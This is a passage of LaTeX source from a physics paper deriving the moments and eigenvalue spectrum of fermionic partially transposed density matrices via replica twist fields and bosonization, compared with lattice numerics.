Here, $\Gamma_{AA}$ and $\Gamma_{BB}$ denote the reduced covariance matrices of subsystems
$A$ and $B$, respectively; while $\Gamma_{AB}=\Gamma_{BA}^\dag$ describes the correlations between them. We define the covariance matrix associated with a partially transposed Gaussian state by
\begin{align} \label{eq:gamma_pt}
\Gamma_{\pm} = \left( \begin{array}{cc}
-\Gamma_{AA} & \pm i \Gamma_{AB} \\
\pm i \Gamma_{BA} & \Gamma_{BB}
\end{array} \right),
\end{align}
where $[\Gamma_+]_{ij}=\frac{1}{2}\text{Tr}({\rho^{T_A}} [c_i,c_j])$ and $[\Gamma_-]_{ij}=\frac{1}{2}\text{Tr}({\rho^{T_A}} ^\dag [c_i,c_j])$.
We should note that $\Gamma_+$ and $\Gamma_-$ have identical eigenvalues while they do not necessarily commute $[\Gamma_+,\Gamma_-]\neq0$.
In general, the eigenvalues of $\Gamma_+$ appear in
quartets $(\pm \nu_k, \pm \nu_k^\ast)$ when $\text{Re}[\nu_k]\neq 0$ and $\text{Im}[\nu_k]\neq 0$ or doublet $\pm \nu_k$ when $\text{Re}[\nu_k]= 0$ (i.e., pure imaginary) or $\text{Im}[\nu_k]= 0$ (i.e., real) . $\pm$ is because of skew symmetry $\Gamma^T_\pm=-\Gamma_\pm$.
In addition, the pseudo-Hermiticity of ${\rho^{T_A}} $ (\ref{eq:property1}) implies that
\begin{align} \label{eq:pseudo_gam}
\Gamma_\pm^\dag=U_1 \Gamma_\pm U_1,
\end{align}
where $U_1=(-\mathbb{I}_A \oplus \mathbb{I}_B )$ is the matrix associated with the operator $(-1)^{F_A}$. This means
that for every eigenvalue $\nu_k$ its complex conjugate $\nu_k^\ast$ is also an eigenvalue.
As a result, the moments of PT can be written as
\begin{align}
{\cal N}_n^{({\rm ns})}= \sum_{j=1}^{N} \ln \left| \left(\frac{1-\nu_j}{2}\right)^n+\left(\frac{1+\nu_j}{2}\right)^n \right|.
\end{align}
Note that the sum is now over half of the eigenvalues (say in the upper half complex plane), due to the structure discussed above.
For $\rho^{\widetilde{T}_A}$ we use the multiplication rule for the Gaussian operators where the resulting Gaussian matrix is given by
\begin{align} \label{eq:Omega_Td}
e^{\widetilde{\Omega}_\pm}= \frac{\mathbb{I}+\Gamma_\pm}{\mathbb{I}-\Gamma_\pm} U_1,
\end{align}
which is manifestly Hermitian due to the identity (\ref{eq:pseudo_gam}). Using Eq.~(\ref{eq:rho_w}), the normalization factor is found to be
${\cal Z}_{\widetilde{T}_A}= \text{Tr}(\rho^{\widetilde{T}_A})=\text{Tr}[\rho (-1)^{F_A}]=\sqrt{\det\Gamma_{AA}}$.
From (\ref{eq:Gamma_Omega}) we construct the covariance matrix $\widetilde{\Gamma}_\pm=\tanh(\widetilde{\Omega}/2)$ and compute the moments of $\rho^{\widetilde{T}_A}$ by
\begin{align}
{\cal N}_n^{({\rm r})}= \sum_{j=1}^{N} \ln \left| \left(\frac{1-\tilde\nu_j}{2}\right)^n+\left(\frac{1+\tilde\nu_j}{2}\right)^n \right| + n\ln {\cal Z}_{\widetilde{T}_A},
\end{align}
where $\pm \tilde\nu_j$ are eigenvalues of $\widetilde{\Gamma}_\pm$ which are guaranteed to be real.
Consequently, the logarithmic negativity (\ref{eq:anal_cont_f}) is given by
\begin{align}
{\cal E}= \sum_{j=1}^{N} \ln \left[ \left|\frac{1-\tilde\nu_j}{2}\right| +\left|\frac{1+\tilde\nu_j}{2}\right| \right] + \ln {\cal Z}_{\widetilde{T}_A},
\end{align}
For particle-number conserving systems such as the lattice model in (\ref{eq:Dirac_latt}), the covariance matrix is simplified into the form $\Gamma=\sigma_2 \otimes \gamma$ where $\gamma=(\mathbb{I}-2C)$ and $C_{ij}=\text{Tr}(\rho f_i^\dag f_j)$ is the correlation matrix and $\sigma_2$ is the second Pauli matrix acting on the even/odd indices of Majorana operators $(c_{2j},c_{2j-1})$.
In this case, the transformed correlation matrix for ${\rho^{T_A}} $ is given by
\begin{align} \label{eq:metal_pt}
\gamma_{\pm} = \left( \begin{array}{cc}
-\gamma_{AA} & \pm i \gamma_{AB} \\
\pm i \gamma_{BA} & \gamma_{BB}
\end{array} \right).
\end{align}
The eigenvalues can be divided to two categories: complex eigenvalues $\nu_k$, $\text{Im}[\nu_k]\neq 0$ and real eigenvalues $u_k$, $\text{Im}[u_k]= 0$.
The pseudo-Hermiticity property leads to the identity $\gamma_{\pm}^\dag= U_1 \gamma_\pm U_1$ which implies that complex eigenvalues appear in pairs $(\nu_k,\nu_k^\ast)$. Therefore, the many-body eigenvalues follow the form,
\begin{align} \label{eq:mb_eigs}
\lambda_{\boldsymbol{\sigma},\boldsymbol{\sigma'}}
&=
\prod_{\sigma_l}
\frac{1+\sigma_l u_l}{2}
\prod_{\sigma_k=\sigma_k'}
\frac{1+|\nu_k|^2 + 2\sigma_k \text{Re} [\nu_k]}{4}
\prod_{\sigma_k=-\sigma_k'} \frac{1-|\nu_k|^2 + 2 \sigma_k i \text{Im} [\nu_k]}{4},
\end{align}
where $\boldsymbol{\sigma}=\{ \sigma_k=\pm \}$ is a string of signs. Clearly, the many-body eigenvalues appear in two categories as well: complex conjugate pairs $(\lambda_j,\lambda_j^\ast)$ and
real eigenvalues which are not necessarily degenerate.
We can also derive a simple expression for the correlation matrix $\widetilde C=(\mathbb{I}-\widetilde\gamma)/2$ associated with $\rho^{\widetilde{T}_A}$,
\begin{align} \label{eq:cov_pTd}
\widetilde\gamma =\left( \begin{array}{cc}
-\gamma_{AA}^{-1}(\mathbb{I}_A+\gamma_{AB}\gamma_{BA}) & i\gamma_{AA}^{-1} \gamma_{AB} \gamma_{BB}\\
i\gamma_{BA} & \gamma_{BB}
\end{array} \right).
\end{align}
\section{Spacetime picture for the moments of partial transpose}
\label{sec:spacetime}
In the following two sections, we compute the moments of the partially transposed density matrix and ultimately the logarithmic negativity.
First, we develop a general method using the replica approach \cite{Calabrese2012,Calabrese2013,Herzog2016} and
provide an equivalent spacetime picture of the R\'enyi negativity.
Before we proceed, let us briefly review the replica approach to find the entanglement entropy. Next, we make connections to our construction of PT.
A generic density matrix can be represented in the fermionic coherent state as
\begin{align}
\rho = \int d\alpha d\bar\alpha\ d\beta d\bar\beta\ \rho(\bar\alpha,\beta) \ket{\alpha}\bra{\bar\beta} e^{-\bar\alpha \alpha- \bar\beta\beta} ,
\end{align}
where $\alpha$, $\bar\alpha$, $\beta$ and $\bar\beta$ are independent Grassmann variables and we omit the real-space (and possibly other) indices for simplicity.
The trace formula then reads
\begin{align}
Z_{{\cal R}_n}=\text{Tr}[\rho^n] =& \int \prod_{i=1}^n d\psi_i d\bar \psi_i \ \prod_{i=1}^n \left[ \rho(\bar\psi_i,\psi_i)\right] e^{\sum_{i,j} \bar\psi_i T_{ij} \psi_j },
\end{align}
where the subscripts in $\psi_i$ and $\bar\psi_i$ denote the replica indices and ${T}$ is called the twist matrix,
\begin{align} \label{eq:Tmat}
T=\left(\begin{array}{cccc}
0 & -1 & 0 & \dots \\
0 & 0 & -1 & 0 \\
\vdots & \vdots & \ddots & -1 \\
1 & 0 & \cdots & 0 \\
\end{array} \right).
\end{align}
The above expression can be viewed as a partition function on a $n$-sheet spacetime manifold where the $n$ flavors (replicas) $\psi_i$ are glued in order along the cuts.
Alternatively, one can consider a multi-component field $\Psi= (\psi_1,\cdots,\psi_n)^T$ on a single-sheet spacetime. This way when we traverse a close path through the interval the field gets transformed as $\Psi \mapsto T \Psi$. Hence, each interval can be represented by two branch points ${\cal T}_n$ and ${\cal T}_n^{-1}$ --the so-called twist fields-- and the REE of one interval can be written as a two-point correlator~\cite{Casini2005},
\begin{align}
Z_{{\cal R}_n}=\braket{{\cal T}_n(u) {\cal T}_n^{-1} (v)},
\end{align}
where $u$ and $v$ denote the real space coordinates of the two ends of the interval defining the subsystem $A$.
\begin{figure}
\centering
\includegraphics[scale=.9]{Neg}
\caption{\label{fig:neg_mfd}(a) Spacetime manifold associated with ${Z}_{{\cal N}_n}(\alpha)$, Eq.~\eqref{eq:Zalpha}, for $n=4$. The operator $e^{i\alpha F_A}$ twists the boundary condition of the cycles between two successive sheets, shown as the green path with dashed lines. (b)~Equivalent picture in terms of twist field where we define a multi-component field on a single spacetime sheet.}
\end{figure}
Let us now derive analogous relations for the moments of partially transposed density matrix.
Using the definition of the PT in the coherent state basis~\cite{Shap_pTR}
\begin{align}
\label{eq:pT_coh}
( \ket{\psi_A,\psi_B } \bra{\bar\psi_A,\bar\psi_B} )^{T_A} = \ket{ i\bar\psi_A,\psi_B } \bra{
i\psi_A,\bar{\psi}_B},
\end{align}
we write the general expression for the moments of ${\rho^{T_A}} $ as
\begin{align}
{Z}_{{\cal N}_n}^{({\rm ns})}=\text{Tr}[({\rho^{T_A}} )^n] =& \int \prod_{i=1}^n d\psi_i d\bar \psi_i \ \prod_{i=1}^n \left[ \rho(\bar\psi_i,\psi_i)\right]
e^{\sum_{i,j} \bar\psi_{iA} [ T^{-1}]_{ij} \psi_{jA} }
e^{\sum_{i,j} \bar\psi_{iB} T_{ij} \psi_{jB} },
\label{eq:pTR_NS}
\end{align}
where $\psi_{js}$ and $\bar\psi_{js}$ refer to the field defined within the $s=A, B$ interval of $j$th replica.
Here, we are dealing with two intervals where the twist matrices are $T$ and $T^{-1}$ as shown in Fig.~\ref{fig:neg_mfd}(a).
Therefore, it can be written as a four-point correlator (\ref{fig:neg_mfd}(b))
\begin{align}
{Z}_{{\cal N}_n}^{({\rm ns})}=\braket{{\cal T}_n^{-1}(u_A) {\cal T}_n (v_A) {\cal T}_n(u_B) {\cal T}_n^{-1} (v_B)}.
\end{align}
Note that the order of twist fields are reversed for the first interval.
From the coherent state representation, we can also write the moments of $\rho^{\widetilde{T}_A}$
\begin{align}
{Z}_{{\cal N}_n}^{({\rm r})}
=\text{Tr}[(\rho^{\widetilde{T}_A} )^n]
=& \int \prod_{i=1}^n d\psi_i d\bar \psi_i \ \prod_{i=1}^n \left[ \rho(\bar\psi_i,\psi_i)\right]
e^{\sum_{i,j} \bar\psi_i^{A} \widetilde T_{ij} \psi_j^{A} }
e^{\sum_{i,j} \bar\psi_i^{B} T_{ij} \psi_j^{B} }.
\label{eq:pTR_R}
\end{align}
The twist matrix for interval A is modified to be
\begin{align} \label{eq:TRmat}
\widetilde{T}=\left(\begin{array}{cccc}
0 & \cdots & 0 & -1 \\
1 & \ddots & \vdots & \vdots \\
0 & 1 & 0 & 0 \\
\cdots & 0 & 1 & 0 \\
\end{array} \right),
\end{align}
which can be viewed as a gauge transformed twist matrix $T^{-1}$. Analogously, Eq.~\eqref{eq:pTR_R} can be written in terms of a four-point correlator
\begin{align}
{Z}_{{\cal N}_n}^{({\rm r})}=\braket{\widetilde{\cal T}_n^{-1}(u_A) \widetilde{\cal T}_n (v_A) {\cal T}_n(u_B) {\cal T}_n^{-1} (v_B)},
\end{align}
where $\widetilde{\cal T}_n$ and $\widetilde{\cal T}^{-1}_n$ are twist fields associated with $\widetilde{T}$.
For fermions with a global $U(1)$ gauge symmetry (i.e., particle-number conserving systems) there is a freedom to twist boundary condition along the fundamental cycles (e.g. the dashed-line path in Fig.~\ref{fig:neg_mfd}(a)) of the spacetime manifold by a $U(1)$ phase (or holonomy). The boundary conditions are independent and in principle can be different for different pairs of sheets.
If we assume a replica symmetry (i.e. uniform boundary conditions) $\psi_i \mapsto e^{i\alpha} \psi_i $, the expression for the PT moments in the operator formalism is given by
\begin{align}
\label{eq:Zalpha}
{Z}_{{\cal N}_n}(\alpha)=\text{Tr} [({\rho^{T_A}} e^{i\alpha F_A})^n].
\end{align}
Let us mention that some related quantities such as $\text{Tr} [(\rho\ e^{i\alpha F})^n]$ were previously introduced and dubbed charged entanglement entropies~\cite{Belin2013}. They were further used to determine symmetry resolved entanglement entropies which is the contribution from the density matrix to the entanglement entropies when projected onto a given particle-number sector~\cite{Sierra2018,Sela2018}.
From \eqref{eq:Zalpha}, we get a family of RN parametrized by $\alpha$. However, for a generic fermionic system (including superconductors), the $U(1)$ symmetry is reduced to $\mathbb{Z}_2$ fermion-parity symmetry. Hence, the two quantities of general interest would be
\begin{align}
\label{eq:ZR_def}
{Z}_{{\cal N}_n}(\alpha=\pi) &={Z}_{{\cal N}_n}^{({\rm r})}= \text{Tr} [(\rho^{\widetilde{T}_A})^n], \\
{Z}_{{\cal N}_n}(\alpha=0) &= {Z}_{{\cal N}_n}^{({\rm ns})}=\text{Tr}[({\rho^{T_A}} )^n].
\end{align}
We should reemphasize that either quantities are described by a partition function on the same spacetime manifold (Fig.~\ref{fig:neg_mfd}) as in the case of bosonic systems~\cite{Calabrese2013}, while they differ in the boundary conditions for fundamental cycles of the manifold. In other words, ${Z}_{{\cal N}_n}^{({\rm ns})}$ and ${Z}_{{\cal N}_n}^{({\rm r})}$ correspond to anti-periodic (i.e., Neveu-Schwarz in CFT language) and periodic (Ramond) boundary conditions, respectively.
This can be readily seen by comparing $T^{-1}$ and $\widetilde{T}$.
These boundary conditions correspond to two replica-symmetric spin structures for the spacetime manifold.
This is different from bosonic PT of fermionic systems~\cite{Coser2016_2,Herzog2016}, where RN is given by sum over all possible spin structures. Essentially, the RNs associated with the two types of fermionic PT are identical to two terms in the expansion of bosonic PT in Ref.~\cite{Coser2016_2}.
In what follows, we compute the two RNs for two partitioning schemes:
\begin{itemize}
\item Two \textbf{adjacent intervals} which is obtained by fusing the fields in $v_A$ and $u_B$. Hence, the RNs are given in terms of three-point correlators
\begin{align} \label{eq:ZN_NS}
{Z}_{{\cal N}_n}^{({\rm ns})} = \braket{{\cal T}_n^{-1}(u_A) {\cal T}_n^2(v_A) {\cal T}_n^{-1}(v_B) },
\end{align}
and
\begin{align} \label{eq:ZN_R}
{Z}_{{\cal N}_n}^{({\rm r})} = \braket{\widetilde{\cal T}_n^{-1}(u_A) {\cal Q}_n^2(v_A) {\cal T}_n^{-1}(v_B) },
\end{align}
where we introduce the fusion of unlike twist fields,
\begin{align}
{\cal Q}_n^2:= {\cal T}_n \widetilde{\cal T}_n.
\end{align}
\item
\textbf{Bipartite geometry} where the two intervals together form the entire system which is in the ground state. This time the RNs are obtained by further fusing the fields in $u_A$ and $v_B$ and the final expressions are therefore given by the two-point correlators
\begin{align} \label{eq:b_ZN_NS}
{Z}_{{\cal N}_n}^{({\rm ns})} = \braket{{\cal T}_n^{-2}(u_A) {\cal T}_n^2(v_A) },
\end{align}
and
\begin{align} \label{eq:b_ZN_R}
{Z}_{{\cal N}_n}^{({\rm r})} = \braket{{\cal Q}_n^{-2}(u_A) {\cal Q}_n^2(v_A) }.
\end{align}
\end{itemize}
\section{The spectrum of partial transpose}
\label{sec:negativity}
As mentioned, the first step to compute the tail distribution of the eigenvalues of partially transposed density matrix is to find its moments. To this end, it is more convenient to work in a new basis where the twist matrices are diagonal and decompose the partition function of multi-component field $\Psi$ to $n$ decoupled partition functions. For REE, this leads to
$Z_{{\cal R}_n} = \prod_{k=-(n-1)/2}^{(n-1)/2} Z_{k,n}$, where
\begin{align} \label{eq:Zk}
Z_{k,n} = \braket{{\cal T}_{k,n}(u) {\cal T}_{k,n}^{-1} (v)}.
\end{align}
The monodromy condition for the field around ${\cal T}_{k,n}$ and ${\cal T}_{k,n}^{-1}$ are given by $\psi_k\mapsto e^{\pm i2\pi k/n} \psi_k$.
The calculation of the above partition function can be further simplified in terms of correlators of vertex operators using the bosonization technique in (1+1)d. For instance, in the case of REE, (\ref{eq:Zk}) can be evaluated by~\cite{Casini2005}
\begin{align}
Z_{k,n}= \left\langle V_k(u) V_{-k}(v)
\right\rangle,
\end{align}
where $V_k(x) =e^{-i\frac{k}{n} \phi (x)}$ is the vertex operator and the expectation values is understood on the ground state of the scalar-field theory ${\cal L}_{\phi }=\frac{1}{8\pi}\partial _{\mu }\phi \partial ^{\mu }\phi$.
The correlation function of the vertex operators is found by
\begin{align} \label{eq:boson_corr}
&\braket{V_{e_1}(z_1)\cdots V_{e_N}(z_N)}\propto \prod_{i<j} \left|z_j-z_i \right|^{2e_i e_j}
\end{align}
where $V_e(z)=e^{i e\phi(z)}$ is the vertex operator and $\sum_j e_j=0$. Hence, we can write for the partition function
\begin{align} \label{eq:REE_result}
Z_{{\cal R}_n} \propto& \left| u-v \right|^{-2\sum_k \frac{k^2}{n^2}},
\end{align}
leading to the familiar result
\begin{align}
{\cal R}_n = \frac{n+1}{6n} \ln |u-v| + \cdots
\end{align}
for the REE of 1d free fermions.
Note that ellipses come from the proportionality constant in (\ref{eq:REE_result}) which show sub-leading terms and may depend on microscopic details.
In what follows, we apply the bosonization technique to evaluate ${Z}_{{\cal N}_n}^{({\rm ns})}$ and ${Z}_{{\cal N}_n}^{({\rm r})}$ similar to what we did for the REE. The scaling behavior of RNs in the lattice model is compared with the analytically predicted values of slopes (derived below) for various exponents $n=1,\cdots,7$ in Fig.~\ref{fig:Zns_vs_l}, where the agreement is evident. We should note that the slope does not depend on the chemical potential $\mu$ in the Hamiltonian~(\ref{eq:Dirac_latt}).
\subsection{Spectrum of ${\rho^{T_A}} $ }
In the case of RN (\ref{eq:pTR_NS}),
we can carry out a similar \emph{momentum} decomposition as
\begin{align}
{Z}_{{\cal N}_n}^{({\rm ns})} = \prod_{k=-(n-1)/2}^{(n-1)/2} Z^{(\text{ns})}_{k,n},
\end{align}
where
\begin{align} \label{eq:ZRk_NS}
Z^{(\text{ns})}_{k,n} = \braket{{\cal T}_{k,n}^{-1}(u_A) {\cal T}_{k,n}(v_A) {\cal T}_{k,n}(u_B) {\cal T}_{k,n}^{-1} (v_B)}
\end{align}
is the partition function in the presence of four twist fields. We then use (\ref{eq:boson_corr}) to compute the above correlator for various subsystem geometries. We should note that the following results only include the leading order term in the scaling limit, $\ell_1,\ell_2\to \infty$, where $\ell_1$ and $\ell_2$ are the length of $A$ and $B$ subsystems, respectively.
\begin{figure}[t]
\center
\includegraphics[scale=.93]{Nn_scaling_adjacent}
\caption{\label{fig:Zns_vs_l}
Comparison of numerical (dots) and analytical (solid lines) results for the scaling behavior of the moments of partial transpose (\ref{eq:pTR_NS}) in the up row and (\ref{eq:pTR_R}) in the down row for two subsystem geometries:
(a) two adjacent intervals, and
(b) bipartite geometry. In (a), intervals have equal lengths $\ell_1=\ell_2=\ell$ and $20\leq \ell\leq 200$ on an infinite chain.
In (b), the total system size is $L=400$ and $20\leq \ell\leq 100$.
Different colors correspond to different moments $n$.}
\end{figure}
\subsubsection{Adjacent intervals}
Here, we consider adjacent intervals (c.f.~upper panel of Fig.~\ref{fig:Zns_vs_l}(a)).
The final result is given by
\begin{align}
Z_{k,n}^{(\text{ns})}=\left\{ \begin{array}{lll}
\ell_1^{-4\frac{k^2}{n^2}} \ell_2^{-4\frac{k^2}{n^2}} (\ell_1+\ell_2)^{2\frac{k^2}{n^2}} & & \left|k/n\right|< 1/3 \\
f(\ell_1,\ell_2; |k/n|) \cdot (\ell_1+\ell_2)^{2|\frac{k}{n}|(|\frac{k}{n}|-1)} & & \left|k/n\right|> 1/3
\end{array} \right.
\label{eq:Z_NS_adjacent}
\end{align}
where $f(x,y;q) =
\frac{1}{2}\left[
x^{2(q-1)(-2q+1)} y^{2q(-2q+1)} + x\leftrightarrow y \right]
$.
Notice that the exponents change discontinuously as a function of $k$.
This can be understood as a consequence of
the $2\pi$ ambiguity of the $U(1)$ phase that the Fermi field acquires as it goes around the twist fields.
Essentially, we need to find the dominant term with the lowest scaling dimension in the mode expansion (see Appendix~\ref{app:bosonization} for more details).
Adding up the terms in the ${Z}_{{\cal N}_n}^{({\rm ns})}$ expansion, the final expression
\iffalse
\begin{align} \label{eq:fh_latt_neg_NS}
{\cal N}_n^{({\rm ns})}
=& c^{(1)}_n \ln (\ell_1 \ell_2)
+ c^{(2)}_n \ln (\ell_1+\ell_2)
+ 2 \sum_{k/n>1/3} \ln (\ell_1^{2\Delta_k}+\ell_2^{2\Delta_k}) \nonumber \\
&+ \delta_{n,6N+3} \ln (\ell_1^{-2/3}+\ell_2^{-2/3})
+ \cdots
\end{align}
where
\iffalse
\begin{align}
c^{(1)}_n &= -4 \sum_{|\frac{k}{n}|\leq 1/3} \frac{k^2}{n^2} + 4 \sum_{\frac{k}{n}>1/3} \frac{k}{n} (1-\frac{2k}{n} ), \\
c^{(2)}_n &= 2 \sum_{|\frac{k}{n}|\leq 1/3} \frac{k^2}{n^2} - 4 \sum_{\frac{k}{n}>1/3} \frac{k}{n} (1-\frac{k}{n} )
\end{align}
\fi
\begin{subequations}
\begin{align}
c^{(1)}_n &= -4 \sum_{k} \frac{k^2}{n^2} + 4 \sum_{\frac{k}{n}>1/3} \frac{k}{n} + \frac{2}{3} \delta_{n,6N+3}, \\
c^{(2)}_n &= 2 \sum_{k} \frac{k^2}{n^2} - 4 \sum_{\frac{k}{n}>1/3} \frac{k}{n}- \frac{2}{3} \delta_{n,6N+3} , \\
\Delta_k &= \frac{2k}{n}-1.
\end{align}
\end{subequations}
\fi
in the limit of two equal-length intervals $\ell_1=\ell_2$ is simplified into ${\cal N}_n^{({\rm ns})}
= c_n \ln \ell + \cdots$ where
\iffalse
\begin{align}
c_n &= -6 \sum_{k} \frac{k^2}{n^2} + 4 \sum_{\frac{k}{n}>1/3} (3\frac{k}{n} -1) \\
&= -\frac{n^2-1}{2n} + 4 \sum_{\frac{k}{n}>1/3} (3\frac{k}{n} -1)
\end{align}
\begin{align}
b_n &= 2 \sum_{k} \frac{k^2}{n^2} - 2 \sum_{\frac{k}{n}>1/3} (2\frac{k}{n}-1)+ \frac{1}{3} \delta_{n,6N+3}\\
&= \frac{n^2-1}{6n} - 2 \sum_{\frac{k}{n}>1/3} (2\frac{k}{n}-1)+ \frac{1}{3} \delta_{n,6N+3}
\end{align}
\begin{align}
b_{n}
=
\left\{
\begin{array}{ll}
\frac{1}{9}\left(2n-\frac{3}{2n}\right) &\ \ \ \ \ n=6N, \\
\frac{1}{9}\left(2n-\frac{1}{n}-1\right) & \ \ \ \ \ n=6N+1, \\
\frac{1}{18n} \left( 2n- 1 \right)^2 &\ \ \ \ \ n=6N+2, \\
\frac{1}{9} \left( 2n+ \frac{3}{n} \right) &\ \ \ \ \ n=6N+3, \\
\frac{1}{18n} \left( 2n+1 \right)^2 &\ \ \ \ \ n=6N+4, \\
\frac{1}{9}\left(2n-\frac{1}{n}+1\right) & \ \ \ \ \ n=6N+5,
\end{array}
\right.
\end{align}
We may drop the constant terms which do not depend on $n$.
\fi
\begin{align}
\label{eq:ns_adj_cn}
c_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{3} \left( n- \frac{3}{2n} \right) &\ \ \ \ \ n=6N, \\
-\frac{1}{3} \left( n- \frac{1}{n} \right) & \ \ \ \ \ n=6N+1, 6N+5, \\
-\frac{1}{3} \left( n+ \frac{1}{2n} \right) &\ \ \ \ \ n=6N+2,6N+4, \\
-\frac{1}{3} \left( n+ \frac{3}{n} \right) &\ \ \ \ \ n=6N+3,
\end{array}
\right.
\end{align}
\iffalse
and
\begin{align}
\label{eq:ns_adj_bn}
b_{n}
=
\left\{
\begin{array}{ll}
\frac{1}{9}\left(2n-\frac{3}{2n}\right) &\ \ \ \ \ n=6N, \\
\frac{2}{9}\left(n-\frac{1}{n}\right) & \ \ \ \ \ n=6N+1, 6N+5, \\
\frac{1}{9} \left( 2n+ \frac{1}{2n} \right) &\ \ \ \ \ n=6N+2, 6N+4, \\
\frac{1}{9} \left( 2n+ \frac{3}{n} \right) &\ \ \ \ \ n=6N+3,
\end{array}
\right.
\end{align}
\fi
where $N$ is a non-negative integer.
It is worth recalling that for the bosonic systems, the spectrum of PT contains only positive and negative eigenvalues. As a result, we see even/odd effect for the moments.
Here, however, the moments ${Z}_n^{(\text{ns})}$ have a cyclic behavior with a periodicity of six, which signals the possibility for the eigenvalues to appear with a multiple of $2\pi/6$ complex phase. As we will see below, this is indeed the case in our numerical calculations. We should also note that the above result can be obtained from the adjacent limit $v_A\to u_B$ of two disjoint intervals (\ref{eq:ZRk_NS}) as explained in Appendix~\ref{app:moments}. Taking this limit is a bit tricky and was previously overlooked in Ref.~\cite{Herzog2016}, where it was incorrectly deduced that ${Z}_{{\cal N}_n}^{({\rm ns})}=0$ for two adjacent intervals.
We now discuss the spectrum of ${\rho^{T_A}} $ for two adjacent intervals. It is instructive to look at the many-body eigenvalues as obtained in \eqref{eq:mb_eigs} from the single-body eigenvalues of the covariance matrix (\ref{eq:metal_pt}).
From the numerical observation that $\text{Im}(\nu_k)\neq0$, we may drop the $u_l$ factor in (\ref{eq:mb_eigs}). Hence, the many-body spectrum simplifies to
\begin{align}
\lambda_{\boldsymbol{\sigma},\boldsymbol{\sigma'}}=
\prod_{\sigma_k=\sigma_k'}
\omega_{R\sigma_k}
\prod_{\sigma_k=-\sigma_k'}
\omega_{I\sigma_k'},
\end{align}
where
\begin{subequations}
\begin{align}
\omega_{R\sigma_k}&= \frac{1+|\nu_k|^2 + 2\sigma_k \text{Re} [\nu_k]}{4},\\
\omega_{I\sigma_k}&= \frac{1-|\nu_k|^2 + 2 \sigma_k i \text{Im} [\nu_k]}{4},
\end{align}
\end{subequations}
and $\sigma_{k}=\pm$ is a sign factor. We should note that the complex and negative real eigenvalues come from product of $\omega_{I\sigma_k}$. This fact immediately implies that for every complex eigenvalue $\lambda_j$, $\lambda_j^\ast$ is also in the spectrum, since $\omega_{I-\sigma_k}=\omega_{I\sigma_k}^\ast$. Moreover, the negative eigenvalues are at least two-fold degenerate.
In the case of free fermions, we numerically observe that $\omega_{I\pm}\to|\omega_{I\pm}|e^{\pm i\frac{2\pi}{6}}$ as we go towards the thermodynamic limit $N_A=N_B\to \infty$.
As a result, the many-body eigenvalues are divided into two groups: first, real positive eigenvalues, and second, the complex or negative eigenvalues which take a regular form $\lambda_j\approx |\lambda_j| e^{\pm i\frac{\pi}{3} s_j}$ where $s_j=1,2,3$.
Figure~\ref{fig:rT_spec}(a) shows the numerical spectrum of ${\rho^{T_A}} $. To explicitly demonstrate the quantization of the complex phase of eigenvalues, we plot a histogram of the complex phase in Fig.~\ref{fig:rT_spec}(b) where sharp peaks at integer multiples of $\pi/3$ are evident.
Due to this special structure of the eigenvalues, the moments of ${\rho^{T_A}} $ can be written as
\begin{align}
\label{eq:Zns_spec}
{Z}_{{\cal N}_n}^{({\rm ns})} &= \sum_k |\lambda_k|^n e^{ \frac{i\pi ns_k }{3} } \nonumber \\
&= \sum_j \lambda_{0j}^n
+2\cos\left(\frac{\pi n}{3}\right) \sum_j |\lambda_{1j}|^n
+2\cos\left(\frac{2\pi n}{3}\right) \sum_j |\lambda_{2j}|^n
+ \cos\left(n\pi\right) \sum_j |\lambda_{3j}|^n,
\end{align}
where $\{\lambda_{\alpha j}\}, \alpha=0,1,2,3$ denote the eigenvalues along $\angle\lambda= \alpha\pi/3$ branches. Note that $\{\lambda_{0j}\},\{\lambda_{3j}\}$, i.e., positive and negative real eigenvalues, are treated separately, while $\{\lambda_{1j}\}$ and $\{\lambda_{2j}\}$ represent the eigenvalues for both $\angle \lambda=\pm \pi/3$ and $\angle \lambda=\pm 2\pi/3$ branches. A consequence of Eq.~(\ref{eq:Zns_spec}) is that there are four linearly independent combinations of the eigenvalues in ${Z}_{{\cal N}_n}^{({\rm ns})}$. This exactly matches the four possible scaling behaviors of ${Z}_{{\cal N}_n}^{({\rm ns})}$ from our continuum field theory calculations (\ref{eq:ns_adj_cn}).
\begin{figure}
\center
\includegraphics[scale=.7]{adj_angle_abs}
\caption{\label{fig:rT_spec} Spectral properties of ${\rho^{T_A}} $ for two adjacent intervals with length $\ell$ on an infinite chain. (a) Many-body eigenvalues are plotted over the complex plane. The solid gray lines are guides for the eyes and a hint for the phase quantization. (b) Histogram of complex phases of eigenvalues which indicates nearly quantized phases in units of $\pi/3$. (c) Tail distribution function of modulus of eigenvalues. The solid line is the analytical result (\ref{eq:T_ns_abs}).
To compute the many-body spectrum, we truncate the single-particle spectrum with the first $28$ largest (in euclidean distance from $\pm 1$ on the complex plane) eigenvalues.}
\end{figure}
As a first characterization of the negativity spectrum, we compute the distribution of modulus of eigenvalues. To this end, it is sufficient to consider ${Z}_{{\cal N}_n}^{({\rm ns})}$ for multiples of $n=6N$ which is ${Z}_{{\cal N}_n}^{({\rm ns})}=\sum_k |\lambda_k|^n$. Substituting (\ref{eq:ns_adj_cn}) for $b$ and $a$ in (\ref{eq:Pdist}) and (\ref{eq:Tdist}), we get
\begin{subequations}
\begin{align}
\label{eq:P_ns_abs}
P(|\lambda|) &=\delta(\lambda_M-|\lambda|) + \sqrt{\frac{3}{2}} \frac{b\theta(\lambda_M-|\lambda|)}{|\lambda| \xi} I_1 (\sqrt{6} \xi), \\
n(|\lambda|) &= I_0 (\sqrt{6} \xi),
\label{eq:T_ns_abs}
\end{align}
\end{subequations}
where
\begin{align} \label{eq:xi_ns}
\xi=\sqrt{b\ln|\lambda_M/\lambda|},
\end{align}
and $\lambda_M$ is the largest eigenvalue given by
\begin{align}
\label{eq:lmax_ns_adj}
b=-\ln \lambda_M= \lim_{n\to \infty} \frac{1}{n}\ln \text{Tr}({\rho^{T_A}} )^n= \frac{1}{3} \ln\ell.
\end{align}
Figure~\ref{fig:rT_spec}(c) shows a good agreement between the analytical formula (\ref{eq:T_ns_abs}) and the numerically obtained spectra for various subsystem sizes. We should note that there is no fitting parameter in (\ref{eq:T_ns_abs}) and we only plug in $\lambda_M$ from numerics.
\iffalse
\begin{align}
P_0(\lambda)& =\delta(\lambda_M-\lambda) + \frac{1}{6} [\frac{\beta_0}{\xi_0} I_1(2\xi_0)+ \frac{2\beta_1}{\xi_1} I_1(2\xi_1) - 2\frac{\beta_2}{\xi_2} J_1(2\xi_2)- \frac{\beta_3}{\xi_3} J_1(2\xi_3)],\\
